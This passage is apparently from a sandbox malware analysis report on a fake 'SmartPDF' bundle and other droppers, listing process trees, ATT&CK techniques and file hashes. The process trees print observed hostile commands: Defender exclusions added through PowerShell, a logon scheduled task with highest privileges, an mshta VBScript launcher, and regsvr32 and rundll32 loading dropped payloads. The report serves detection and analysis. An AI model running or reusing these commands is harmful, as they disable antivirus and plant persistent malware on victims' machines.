                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:6000
                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:7668
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-IIP03.tmp\stats.tmp
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-IIP03.tmp\stats.tmp" /SL5="$30330,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                  PID:8492
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LDAH5.tmp\Setup.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LDAH5.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                      PID:9460
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\SmartPDF\SmartPDF\SmartPDF.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\SmartPDF\SmartPDF\SmartPDF.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:5936
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                        PID:8288
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                            PID:5408
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Program Files (x86)\SmartPDF\SmartPDF\SmartPDF.exe"
                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                            PID:8480
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Program Files (x86)\SmartPDF\SmartPDF\SmartPDF.exe"
                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                PID:3680
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3348
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                      PID:10000
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\services32.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                      PID:9316
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                                                          PID:9452
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6172
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8832
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:9564
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2176
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:10344
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:9476
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\choice.exe
                                                                                                                                                                                                                                                                                                                                                                      choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:9652
                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6592
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7920
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp585D_tmp.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmp585D_tmp.exe"
                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:9936
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                                                                                                                                          dllhost.exe
                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:10120
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            cmd /c cmd < Pei.xll
                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6688
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:9964
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7856
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8340
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7604
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5007632.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5007632.exe"
                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:9252
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3140807.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3140807.exe"
                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:9296
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6429957.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6429957.exe"
                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:9340
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7965019.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7965019.exe"
                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:9416
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lFgzhBET5yDaQUYD3LXWzdUs.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lFgzhBET5yDaQUYD3LXWzdUs.exe"
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5408
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6613912.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6613912.exe"
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6844
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8970184.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8970184.exe"
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6924
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6684649.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6684649.exe"
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6956
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5515465.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5515465.exe"
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7048
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\3t0ALc3UrSOXpk6Uf8_Czw4Y.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\3t0ALc3UrSOXpk6Uf8_Czw4Y.exe"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:2700
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                              PID:1824
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                PID:1088
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1856
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3760
                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                              PID:1456
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:4232
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\LqTbrK58kojFcJ4GPNAwpsC1.exe"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "" == "" for %A IN ( "C:\Users\Admin\Documents\LqTbrK58kojFcJ4GPNAwpsC1.exe" ) do taskkill /f -im "%~nxA"
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5804
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
                                                                                                                                                                                                                                                                                                                                                                                                    X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2884
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "-PXPoqL0iOUHHP7hXFattB5ZvsV " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6384
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                            taskkill /f -im "LqTbrK58kojFcJ4GPNAwpsC1.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                            PID:5124
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6720
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5796
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2712
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2232
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10056
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9992

                                                                                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                                                                                                                      Change Default File Association

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1042

                                                                                                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                        07e143efd03815a3b8c8b90e7e5776f0

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                        077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                        32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                        79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                        23bcdc132d1f2aaf8d248b6a5bd21801

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                        2153acec77f4a57c621a3e38d523eb6df9b29134

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                        a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                        d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db

                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                        23bcdc132d1f2aaf8d248b6a5bd21801

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                        2153acec77f4a57c621a3e38d523eb6df9b29134

                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

